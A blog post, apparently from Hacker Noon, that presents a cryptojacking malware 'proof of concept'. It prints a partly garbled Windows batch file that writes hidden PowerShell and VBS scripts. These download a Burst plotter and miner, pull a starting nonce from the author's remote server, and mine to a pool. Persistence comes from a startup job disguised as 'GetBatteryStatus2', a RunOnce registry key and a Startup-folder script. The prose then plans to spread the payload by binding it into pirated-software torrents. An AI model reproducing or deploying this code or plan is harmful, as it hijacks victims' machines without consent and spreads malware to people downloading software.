I was going to marathon livestream this, but all the joys of Hacker Noon's recent affiliation with Coil are beginning to show me (fractional) love. Note to author-hackers: Your Uphold endpoint needs to be set on both Coil and on Hacker Noon settings page. :) Mine wasn't for the first little while, proving $0-revenues until fixing it and voila! A fraction of a penny! Now, onwards to my POC. Note that I haven't created (most of) this and haven't propagated it to any non-consenting machines. Hypothesizing isn't illegal, right? Note: I did create most of the mining-in-powershell script and executed it awhile ago. The other aspects of this POC are brand-spanking new. Look at that, I even found a bit of incriminating code :) @echo off @echo mkdir c:\temp >>stuff.ps1 @echo $disk = Get-WmiObject Win32_LogicalDisk -Filter >>stuff.ps1 @echo $nonces=$disk.FreeSpace/ / / / * >>stuff.ps1 @echo $web_client = -object system.net.webclient >>stuff.ps1 @echo $build_info=$web_client.DownloadString( ) >>stuff.ps1 @echo $start=$build_info.nonce >>stuff.ps1 @echo ( -object System.Net.WebClient).DownloadFile( , ) >>stuff.ps1 @echo $nonces=[math]::floor($nonces) >>stuff.ps1 @echo $start=[math]::floor($start) >>stuff.ps1 @echo Add-Type -AssemblyName System.IO.Compression.FileSystem >>stuff.ps1 @echo [System.IO.Compression.ZipFile]::ExtractToDirectory( , ) >>stuff.ps1 @echo start-process -NoNewWindow -FilePath -ArgumentList >>stuff.ps1 @echo ( -object System.Net.WebClient).DownloadFile( , ) >>stuff.ps1 @echo [System.IO.Compression.ZipFile]::ExtractToDirectory( , ) >>stuff.ps1 @echo $out = ^ >>stuff.ps1 @echo rm c:\temp\config.yaml >>stuff.ps1 @echo add-content c:\temp\config.yaml $out >>stuff.ps1 @echo start-process -NoNewWindow -FilePath -ArgumentList >>stuff.ps1 @echo $ps1 = >>stuff.ps1 @echo rm c:\temp\ps1.ps1 >>stuff.ps1 @echo add-content c:\temp\ps1.ps1 $ps1 >>stuff.ps1 @echo $trigger = New-JobTrigger -AtStartup >>stuff.ps1 @echo $user=[Environment]::UserName >>stuff.ps1 @echo $start= >> stuff.ps1 mkdir c:\temp @echo $vbs= >>stuff.ps1 @echo add-content $vbs >>stuff.ps1 @echo set args = WScript.Arguments >> c:\temp\invis.vbs @echo num = args.Count >> c:\temp\invis.vbs @echo num = then >> c:\temp\invis.vbs @echo WScript.Echo >> c:\temp\invis.vbs @echo WScript.Quit >> c:\temp\invis.vbs @echo end >> c:\temp\invis.vbs @echo sargs = >> c:\temp\invis.vbs @echo num > then >> c:\temp\invis.vbs @echo sargs = >> c:\temp\invis.vbs @echo k = to num - >> c:\temp\invis.vbs @echo anArg = args.Item(k) >> c:\temp\invis.vbs @echo sargs = sargs & anArg & >> c:\temp\invis.vbs @echo next >> c:\temp\invis.vbs @echo end >> c:\temp\invis.vbs @echo WshShell = WScript.CreateObject( ) >> c:\temp\invis.vbs @echo WshShell.Run ^ ^ & WScript.Arguments( ) & ^ ^ & sargs, , False >> c:\temp\invis.vbs @echo add-content $start >>stuff.ps1 @echo Register-ScheduledJob -Trigger $trigger -FilePath c:\temp\ps1.ps1 -Name GetBatteryStatus2 >>stuff.ps1 @echo -itemproperty . MyKey -propertytype -value ^ >>stuff.ps1 @echo start-process -NoNewWindow -FilePath ^ -ArgumentList ^ >>stuff.ps1 START powershell -WindowStyle Hidden -ExecutionPolicy ByPass -File "DeviceID='C:'" 1024 1024 1024 2 4096 new "http://noncecalculator.duckdns.org:3000/?nonces=$nonces" new 'https://github.com/PoC-Consortium/engraver/releases/download/2.20/engraver-2.2.0-x86_64-pc-windows-msvc.zip.zip' 'c:/temp/engraver.zip' 'c:/temp/engraver.zip' 'c:/temp' 'c:\temp\engraver_cpu.exe' "-l -i 10478801653490313100 -s $start -n $nonces -p c:\temp" new 'https://github.com/PoC-Consortium/scavenger/releases/download/v.1.7.2/scavenger-1.7.2-x86_64-pc-windows-msvc-cpu-only.zip' 'c:/temp/scavenger.zip' 'c:/temp/scavenger.zip' 'c:/temp' "plot_dirs: >>stuff.ps1 @echo - 'C:\temp' >>stuff.ps1 @echo url: 'http://0-100-pool.burst.cryptoguru.org:8124' >>stuff.ps1 @echo hdd_reader_thread_count: 0 # default 0 (=auto: number of disks) >>stuff.ps1 @echo hdd_use_direct_io: true # default true >>stuff.ps1 @echo hdd_wakeup_after: 240 # default 240s >>stuff.ps1 @echo cpu_threads: 0 # default 0 (=auto: number of logical cpu cores) >>stuff.ps1 @echo cpu_worker_task_count: 4 # default 4 (0=GPU only) >>stuff.ps1 @echo cpu_nonces_per_cache: 65536 # default 65536 >>stuff.ps1 @echo cpu_thread_pinning: false # default false >>stuff.ps1 @echo gpu_threads: 0 # default 0 (=GPU off) >>stuff.ps1 @echo gpu_platform: 0 # default 0 >>stuff.ps1 @echo gpu_device: 0 # default 0 >>stuff.ps1 @echo gpu_worker_task_count: 0 # default 0 (=CPU only) >>stuff.ps1 @echo gpu_nonces_per_cache: 262144 # default 262144 >>stuff.ps1 @echo gpu_mem_mapping: false # default false >>stuff.ps1 @echo gpu_async: false # default false >>stuff.ps1 @echo target_deadline: 31536000 # default u32::MAX >>stuff.ps1 @echo account_id_to_target_deadline: # target dls for multi-id (optional) >>stuff.ps1 @echo 10282355196851764065: 600000 >>stuff.ps1 @echo 1796535821016683299: 55555555 >>stuff.ps1 @echo get_mining_info_interval: 3000 # default 3000ms >>stuff.ps1 @echo timeout: 5000 # default 5000ms >>stuff.ps1 @echo send_proxy_details: true # default false >>stuff.ps1 @echo console_log_level: 'info' # default Info, options (off, error, warn, info, debug, trace) >>stuff.ps1 @echo logfile_log_level: 'warn' # default Warn, options (off, serror, warn, info, debug, trace) >>stuff.ps1 @echo logfile_max_count: 10 # maximum number of log files to keep >>stuff.ps1 @echo logfile_max_size : 20 # maximum size per logfile in MiB >>stuff.ps1 @echo show_progress: true # default true >>stuff.ps1 @echo show_drive_stats: false # default false >>stuff.ps1 @echo benchmark_only: 'disabled' # default disabled, options (disabled, I/O, XPU)^" 'c:\temp\scavenger.exe' "-c c:\temp\config.yaml" 'set-location HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce >>stuff.ps1 @echo new-itemproperty . MyKey -propertytype String -value ^"Powershell c:\temp\ps1.ps1^" >>stuff.ps1 @echo start-process -NoNewWindow -FilePath ^"c:\temp\scavenger.exe^" -ArgumentList ^"-c c:\temp\config.yaml^"' 'c:\temp\scavenger.exe -c c:\temp\config.yaml > output.txt' 'wscript.exe c:\temp\invis.vbs c:\temp\startup.cmd %*' "C:\Users\$user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup2.cmd" if 0 "Usage: [CScript | WScript] invis.vbs aScript.bat <some script arguments>" 1 if "" if 1 " " for 1 1 " " if Set "WScript.Shell" "^" "^" 0 "^" "^" 0 "C:\temp\startup.cmd" new String "Powershell c:\temp\ps1.ps1^" "c:\temp\scavenger.exe^" "-c c:\temp\config.yaml^" "stuff.ps1" Alright, so, to break this down into small achievable steps with some logic, the idea was to choose a crypto to jack people's computers without using their CPU/GPU (which most people, no matter how daft, notice and diagnose). Most botnet-friendly cryptos will use a % of the target machine's CPU or (sometimes) GPUs to mine crypt. I chose Burst - but since then Burstcoin changed it's heads and became BHD and a ton of other related coins. You can mine them all using this same script - would just need to change (some of) the execution here. The above Windows batch file will save some commands to different Powershell scripts it then runs. In short, it figures out how much hard drive space is on C:, then takes a % of that and runs 'engraver' which is a FOSS Burst command-line plotter in the background. Assuming the computer is on long enough for this process to finish, it would - on startup - launch 'scavenger' to mine that Burst. There's more complicated stuff in here than just that - for instance, running an 'invisible' Windows Command Prompt, using a script I found in the netherwebs, or loading a JSON response from my centralized server (which would have been incriminating should this plot be executed on...) in order to assess the starting nonce for this next target. Now, to propagate this over the internet (without any budget to speak of) we'd download the top (smaller MB sized) software torrents from thepiratebay or a like site, by popularity. Naturally, some folks would download our newly seeded torrents, execute the .exe inside where our batch file is cleanly (and fully-undetectably) combined with that .exe, they'd get their hacked software and we'd get our batch ran on their system. Some of these folks would reseed - we'd force them to by re-downloading the torrent and data and seeding it using a system process and command-line windows torrent software (that I'm not sure exists). There you have it - non-invasive propagation. People want free software, consume free software, and acquire all sorts of nastiness - lowering their UAC shields to do so by default. Note that parts of these directions were obfuscated to be less effective (selflessly) or less incriminating (selfishly), in the probable deniability sense.
